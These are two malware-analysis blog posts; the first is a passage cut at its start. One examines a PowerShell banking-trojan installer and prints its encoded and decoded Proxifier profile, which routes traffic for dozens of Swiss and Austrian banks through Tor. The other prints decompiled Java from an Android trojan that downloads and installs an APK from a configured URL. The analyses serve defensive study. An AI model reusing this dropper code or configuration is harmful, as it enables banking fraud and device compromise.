xUYXJnZXRzPmxvY2FsaG9zdDsgMTI3LjAuMC4xOyAlQ29tcHV0ZXJOYW1lJTsgYXBpLmlwaWZ5Lm9yZzwvVGFyZ2V0cz4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPnNvZnQ8L05hbWU+DQogICAgICA8QXBwbGljYXRpb25zPmZpcmVmb3guZXhlO2lleHBsb3JlLmV4ZTtjaHJvbWUuZXhlPC9BcHBsaWNhdGlvbnM+DQogICAgICA8VGFyZ2V0cz4qcG9zdGZpbmFuY2UuY2g7Y3MuZGlyZWN0bmV0LmNvbTtlYi5ha2IuY2g7Ki51YnMuY29tO3RiLnJhaWZmZWlzZW5kaXJlY3QuY2g7Ki5ia2IuY2g7Ki5sdWtiLmNoOyouemtiLmNoOyoub25iYS5jaDtlLWJhbmtpbmcuZ2tiLmNoOyouYmVrYi5jaDt3d3dzZWMuZWJhbmtpbmcuenVnZXJrYi5jaDtuZXRiYW5raW5nLmJjZ2UuY2g7Ki5yYWlmZmVpc2VuLmNoOyouY3JlZGl0LXN1aXNzZS5jb207Ki5iYW5rYXVzdHJpYS5hdDsqLmJhd2FncHNrLmNvbTsqLnJhaWZmZWlzZW4uYXQ7Ki5zdGF0aWMtdWJzLmNvbTsqLmJhd2FnLmNvbTsqLmNsaWVudGlzLmNoO2NsaWVudGlzLmNoOypiY3ZzLmNoOypjaWMuY2g7d3d3LmJhbmtpbmcuY28uYXQ7Km9iZXJiYW5rLmF0O3d3dy5vYmVyYmFuay1iYW5raW5nLmF0OypiYWxvaXNlLmNoOyoudWtiLmNoO3Vya2IuY2g7Ki51cmtiLmNoOyouZWVrLmNoOypzemtiLmNoOypzaGtiLmNoOypnbGtiLmNoOypua2IuY2g7Km93a2IuY2g7KmNhc2guY2g7KmJjZi5jaDsqLmVhc3liYW5rLmF0O2ViYW5raW5nLnJhaWZmZWlzZW4uY2g7Ki5vbmlvbjsqYmN2LmNoOypqdWxpdXNiYWVyLmNvbTsqYWJzLmNoOypiY24uY2g7KmJsa2IuY2g7KmJjai5jaDsqenVlcmNoZXJsYW5kYmFuay5jaDsqdmFsaWFudC5jaDsqd2lyLmNoPC9UYXJnZXRzPg0KICAgICAgPEFjdGlvbiB0eXBlPSJQcm94eSI+MTAwPC9BY3Rpb24+DQogICAgPC9SdWxlPg0KICAgIDxSdWxlIGVuYWJsZWQ9InRydWUiPg0KICAgICAgPE5hbWU+RGVmYXVsdDwvTmFtZT4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgPC9SdWxlTGlzdD4NCjwvUHJveGlmaWVyUHJvZmlsZT4=';
AddTask 'ChromeUpdate' $p '' 1;
}
InstallTP


In the beginning, there is a function 'unzip' in charge of downloading an application from URL https://chocolatey.org/7za.exe to unzip compressed files.

 Then, the function 'Base64ToFile' does a base64 decode of a string and stores the output in a file

 But the key function, is the last one, InstallTP, which does several things:
  1. Pulls a file from http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031 Which permits to run the malicious process automatically as a task
  2. Pulls the Tor client from https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip to forward the traffic through Tor
  3.  Pulls the Proxifier application from http://proxifier.com/distr/ProxifierPE.zip
  4. Configures the Settings.ini for the Proxyfier
  5. And finally, it is the interesting stuff, the Proxifier profile, where I can see all the banks for which the traffic is sent through Tor

echo "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPFByb3hpZmllclByb2ZpbGUgdmVyc2lvbj0iMTAxIiBwbGF0Zm9ybT0iV2luZG93cyIgcHJvZHVjdF9pZD0iMSIgcHJvZHVjdF9taW52ZXI9IjMxMCI+DQogIDxPcHRpb25zPg0KICAgIDxSZXNvbHZlPg0KICAgICAgPEF1dG9Nb2RlRGV0ZWN0aW9uIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgICAgPFZpYVByb3h5IGVuYWJsZWQ9InRydWUiPg0KICAgICAgICA8VHJ5TG9jYWxEbnNGaXJzdCBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICAgIDwvVmlhUHJveHk+DQogICAgICA8RXhjbHVzaW9uTGlzdD4lQ29tcHV0ZXJOYW1lJTsgbG9jYWxob3N0OyAqLmxvY2FsPC9FeGNsdXNpb25MaXN0Pg0KICAgIDwvUmVzb2x2ZT4NCiAgICA8UHJveGlmaWNhdGlvblBvcnRhYmxlRW5naW5lIHN1YnN5c3RlbT0iMzIiPg0KICAgICAgPExvY2F0aW9uPkJhc2VQcm92aWRlcjwvTG9jYXRpb24+DQogICAgICA8VHlwZSBob3RwYXRjaD0idHJ1ZSI+UHJvbG9ndWU8L1R5cGU+DQogICAgPC9Qcm94aWZpY2F0aW9uUG9ydGFibGVFbmdpbmU+DQogICAgPFByb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZSBzdWJzeXN0ZW09IjY0Ij4NCiAgICAgIDxMb2NhdGlvbj5CYXNlUHJvdmlkZXI8L0xvY2F0aW9uPg0KICAgICAgPFR5cGUgaG90cGF0Y2g9ImZhbHNlIj5Qcm9sb2d1ZTwvVHlwZT4NCiAgICA8L1Byb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZT4NCiAgICA8RW5jcnlwdGlvbiBtb2RlPSJiYXNpYyIgLz4NCiAgICA8SHR0cFByb3hpZXNTdXBwb3J0IGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxIYW5kbGVEaXJlY3RDb25uZWN0aW9ucyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICA8Q29ubmVjdGlvbkxvb3BEZXRlY3Rpb24gZW5hYmxlZD0idHJ1ZSIgLz4NCiAgICA8UHJvY2Vzc1NlcnZpY2VzIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxQcm9jZXNzT3RoZXJVc2VycyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgPC9PcHRpb25zPg0KICA8UHJveHlMaXN0Pg0KICAgIDxQcm94eSBpZD0iMTAwIiB0eXBlPSJTT0NLUzUiPg0KICAgICAgPEFkZHJlc3M+MTI3LjAuMC4xPC9BZGRyZXNzPg0KICAgICAgPFBvcnQ+OTA1MDwvUG9ydD4NCiAgICAgIDxPcHRpb25zPjQ4PC9PcHRpb25zPg0KICAgIDwvUHJveHk+DQogIDwvUHJveHlMaXN0Pg0KICA8Q2hhaW5MaXN0IC8+DQogIDxSdWxlTGlzdD4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPkxvY2FsaG9zdDwvTmFtZT4NCiAgICAgIDxUYXJnZXRzPmxvY2FsaG9zdDsgMTI3LjAuMC4xOyAlQ29tcHV0ZXJOYW1lJTsgYXBpLmlwaWZ5Lm9yZzwvVGFyZ2V0cz4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPnNvZnQ8L05hbWU+DQogICAgICA8QXBwbGljYXRpb25zPmZpcmVmb3guZXhlO2lleHBsb3JlLmV4ZTtjaHJvbWUuZXhlPC9BcHBsaWNhdGlvbnM+DQogICAgICA8VGFyZ2V0cz4qcG9zdGZpbmFuY2UuY2g7Y3MuZGlyZWN0bmV0LmNvbTtlYi5ha2IuY2g7Ki51YnMuY29tO3RiLnJhaWZmZWlzZW5kaXJlY3QuY2g7Ki5ia2IuY2g7Ki5sdWtiLmNoOyouemtiLmNoOyoub25iYS5jaDtlLWJhbmtpbmcuZ2tiLmNoOyouYmVrYi5jaDt3d3dzZWMuZWJhbmtpbmcuenVnZXJrYi5jaDtuZXRiYW5raW5nLmJjZ2UuY2g7Ki5yYWlmZmVpc2VuLmNoOyouY3JlZGl0LXN1aXNzZS5jb207Ki5iYW5rYXVzdHJpYS5hdDsqLmJhd2FncHNrLmNvbTsqLnJhaWZmZWlzZW4uYXQ7Ki5zdGF0aWMtdWJzLmNvbTsqLmJhd2FnLmNvbTsqLmNsaWVudGlzLmNoO2NsaWVudGlzLmNoOypiY3ZzLmNoOypjaWMuY2g7d3d3LmJhbmtpbmcuY28uYXQ7Km9iZXJiYW5rLmF0O3d3dy5vYmVyYmFuay1iYW5raW5nLmF0OypiYWxvaXNlLmNoOyoudWtiLmNoO3Vya2IuY2g7Ki51cmtiLmNoOyouZWVrLmNoOypzemtiLmNoOypzaGtiLmNoOypnbGtiLmNoOypua2IuY2g7Km93a2IuY2g7KmNhc2guY2g7KmJjZi5jaDsqLmVhc3liYW5rLmF0O2ViYW5raW5nLnJhaWZmZWlzZW4uY2g7Ki5vbmlvbjsqYmN2LmNoOypqdWxpdXNiYWVyLmNvbTsqYWJzLmNoOypiY24uY2g7KmJsa2IuY2g7KmJjai5jaDsqenVlcmNoZXJsYW5kYmFuay5jaDsqdmFsaWFudC5jaDsqd2lyLmNoPC9UYXJnZXRzPg0KICAgICAgPEFjdGlvbiB0eXBlPSJQcm94eSI+MTAwPC9BY3Rpb24+DQogICAgPC9SdWxlPg0KICAgIDxSdWxlIGVuYWJsZWQ9InRydWUiPg0KICAgICAgPE5hbWU+RGVmYXVsdDwvTmFtZT4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgPC9SdWxlTGlzdD4NCjwvUHJveGlmaWVyUHJvZmlsZT4="  | base64 --decode
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ProxifierProfile version="101" platform="Windows" product_id="1" product_minver="310">
  <Options>
    <Resolve>
      <AutoModeDetection enabled="false" />
      <ViaProxy enabled="true">
        <TryLocalDnsFirst enabled="false" />
      </ViaProxy>
      <ExclusionList>%ComputerName%; localhost; *.local</ExclusionList>
    </Resolve>
    <ProxificationPortableEngine subsystem="32">
      <Location>BaseProvider</Location>
      <Type hotpatch="true">Prologue</Type>
    </ProxificationPortableEngine>
    <ProxificationPortableEngine subsystem="64">
      <Location>BaseProvider</Location>
      <Type hotpatch="false">Prologue</Type>
    </ProxificationPortableEngine>
    <Encryption mode="basic" />
    <HttpProxiesSupport enabled="false" />
    <HandleDirectConnections enabled="false" />
    <ConnectionLoopDetection enabled="true" />
    <ProcessServices enabled="false" />
    <ProcessOtherUsers enabled="false" />
  </Options>
  <ProxyList>
    <Proxy id="100" type="SOCKS5">
      <Address>127.0.0.1</Address>
      <Port>9050</Port>
      <Options>48</Options>
    </Proxy>
  </ProxyList>
  <ChainList />
  <RuleList>
    <Rule enabled="true">
      <Name>Localhost</Name>
      <Targets>localhost; 127.0.0.1; %ComputerName%; api.ipify.org</Targets>
      <Action type="Direct" />
    </Rule>
    <Rule enabled="true">
      <Name>soft</Name>
      <Applications>firefox.exe;iexplore.exe;chrome.exe</Applications>
      <Targets>*postfinance.ch;cs.directnet.com;eb.akb.ch;*.ubs.com;tb.raiffeisendirect.ch;*.bkb.ch;*.lukb.ch;*.zkb.ch;*.onba.ch;e-banking.gkb.ch;*.bekb.ch;wwwsec.ebanking.zugerkb.ch;netbanking.bcge.ch;*.raiffeisen.ch;*.credit-suisse.com;*.bankaustria.at;*.bawagpsk.com;*.raiffeisen.at;*.static-ubs.com;*.bawag.com;*.clientis.ch;clientis.ch;*bcvs.ch;*cic.ch;www.banking.co.at;*oberbank.at;www.oberbank-banking.at;*baloise.ch;*.ukb.ch;urkb.ch;*.urkb.ch;*.eek.ch;*szkb.ch;*shkb.ch;*glkb.ch;*nkb.ch;*owkb.ch;*cash.ch;*bcf.ch;*.easybank.at;ebanking.raiffeisen.ch;*.onion;*bcv.ch;*juliusbaer.com;*abs.ch;*bcn.ch;*blkb.ch;*bcj.ch;*zuercherlandbank.ch;*valiant.ch;*wir.ch</Targets>
      <Action type="Proxy">100</Action>
    </Rule>
    <Rule enabled="true">
      <Name>Default</Name>
      <Action type="Direct" />
    </Rule>
  </RuleList>
</ProxifierProfile>


So in essence, and answering my own question, the configuration of the proxy is not downloaded anywhere, but just hardcoded 


and obfuscated in the code.
Publicado por
Etiquetas: , ,

Thursday, January 21, 2016

Tinba: Continuation of the APK malware analysis

During my previous post I explained that the new version of the Android Bank trojan related to Tinba is able to install other APK for persistence purposes. During a first look on both samples the core functionality in terms of stealing 2FA remains the same. However, in terms of the capabilities to install new APKs, only the one of them have them.

 In order to perform the installation, I can see in the AndroidManifest.xml that there is some extra permissions in one of the APK: 
"android.permission.BIND_ACCESSIBILITY_SERVICE" which it is clearly related to the way the malware fools the user through the accessibility menu, as explained in previous post.

  

What I am really interested is the java methods in charge of performing the tasks of downloading he APK and doing the installation. Looking around a bit with Androguard and following the flows of the code I ended up with a class file which contains the code:

 
package com.google.securesms.xservices;
public class g extends android.os.AsyncTask {
    final synthetic com.google.securesms.xservices.XUpdate a;
    private android.content.Context b;

    public g(com.google.securesms.xservices.XUpdate p1)
    {
        this.a = p1;
        return;
    }

    protected varargs Void a(String[] p6)
    {
        android.content.Intent v0_3 = ((java.net.HttpURLConnection) new java.net.URL(p6[0]).openConnection());
        v0_3.setRequestMethod("GET"); 
        v0_3.setDoOutput(1);
        v0_3.connect();
        String v2_3 = new java.io.File(new StringBuilder().append(android.os.Environment.getExternalStorageDirectory()).append("/download/").toString());
        v2_3.mkdirs();
        android.content.Context v1_10 = new java.io.File(v2_3, "update.apk");
        if (v1_10.exists()) {
            v1_10.delete();
        }
        String v2_6 = new java.io.FileOutputStream(v1_10);
        android.content.Intent v0_4 = v0_3.getInputStream();
        android.content.Context v1_12 = new byte[1024];
        while(true) {
            String v3_1 = v0_4.read(v1_12);
            if (v3_1 == -1) {
                break;
            }
            v2_6.write(v1_12, 0, v3_1);
        }
        v2_6.close();
        v0_4.close();
        android.content.Intent v0_6 = new android.content.Intent("android.intent.action.VIEW");
        v0_6.setDataAndType(android.net.Uri.fromFile(new java.io.File(new StringBuilder().append(android.os.Environment.getExternalStorageDirectory()).append("/download/update.apk").toString())), "application/vnd.android.package-archive");
        v0_6.setFlags(268435456);
        this.b.startActivity(v0_6);
        return 0;
    }

    public void a(android.content.Context p1)
    {
        this.b = p1;
        return;
    }

    protected synthetic Object doInBackground(Object[] p2)
    {
        return this.a(((String[]) p2));
    }
}


This class basically downloads a file and keeps it as 'update.apk' in the external storage directory 'download', which in the end is /sdcard/download/update.apk. Later on, through the intent 'android.intent.action.VIEW'  the file is opened, hence executed, as can be seen in the logs

  I/ActivityManager(778): START u0 {act=android.intent.action.VIEW dat=file:///storage/emulated/0/Download/update.apk typ=application/vnd.android.package-archive cmp=com.android.packageinstaller/.PackageInstallerActivity} from uid 10084 on display 0

 I/ActivityManager(778): START u0 {dat=file:///storage/emulated/0/Download/update.apk cmp=com.android.packageinstaller/.InstallAppProgress (has extras)} from uid 10063 on display 0


The URL from the malware is downloaded is stored in the initial MainPref.xml, DOWNLOAD_URL. That field is parsed through one of the methods called in the com.google.securesms.xservices.


package com.google.securesms.xservices;
public class XUpdate extends android.content.BroadcastReceiver {

    public XUpdate()
    {
        return;
    }

    public void onReceive(android.content.Context p6, android.content.Intent p7)
    {
        if (com.google.securesms.j.i.a("DEL", 0, p6) <= 0) {
            if ((!com.google.securesms.j.i.c()) || ((!com.google.securesms.j.i.r(p6)) || ((com.google.securesms.i.ac.a(p6)) || (com.google.securesms.j.i.a("RTB", 0, p6) <= 0)))) {
                if ((!com.google.securesms.j.i.b()) || (com.google.securesms.j.i.r(p6))) {
                    if ((com.google.securesms.j.i.b()) && ((com.google.securesms.j.i.r(p6)) && ((!com.google.securesms.j.i.a(p6, com.google.securesms.j.i.c)) && (!com.google.securesms.j.i.a("DOWNLOAD_URL", "", p6).isEmpty())))) {
                        com.google.securesms.xservices.g v0_17 = new com.google.securesms.xservices.g(this);
                        v0_17.a(p6);
                        String[] v1_2 = new String[1];
                        v1_2[0] = com.google.securesms.j.i.a("DOWNLOAD_URL", "", p6);
                        v0_17.execute(v1_2);
                    }
                } else {
                    com.google.securesms.xservices.g v0_19 = new android.content.Intent(p6, com.google.securesms.xpack.ActAS);
                    v0_19.addFlags(131072);
                    v0_19.addFlags(268435456);
                    p6.startActivity(v0_19);
                }
            } else {
                com.google.securesms.j.i.q(p6);
                android.media.RingtoneManager.getRingtone(p6, android.media.RingtoneManager.getDefaultUri(2)).play();
            }
        } else {
            com.google.securesms.j.i.c("UNINST", "Action for uninstall fixed", p6);
            com.google.securesms.xservices.g v0_25 = new android.content.Intent(p6, com.google.securesms.xpack.ActUpdate);
            v0_25.addFlags(268435456);
            p6.startActivity(v0_25);
        }
        return;
    }
}


By the time of writing this post the URL is still active, so it is possible to download the malware for further analysis. Also, it is reported in VT with hash
ce1cf0db8c84e9c903faf33e65c3cea4fa596e4d8ad169f9c48ed9629cf24c0d


Publicado por
Etiquetas: , , ,
Subscribe to: Comments (Atom)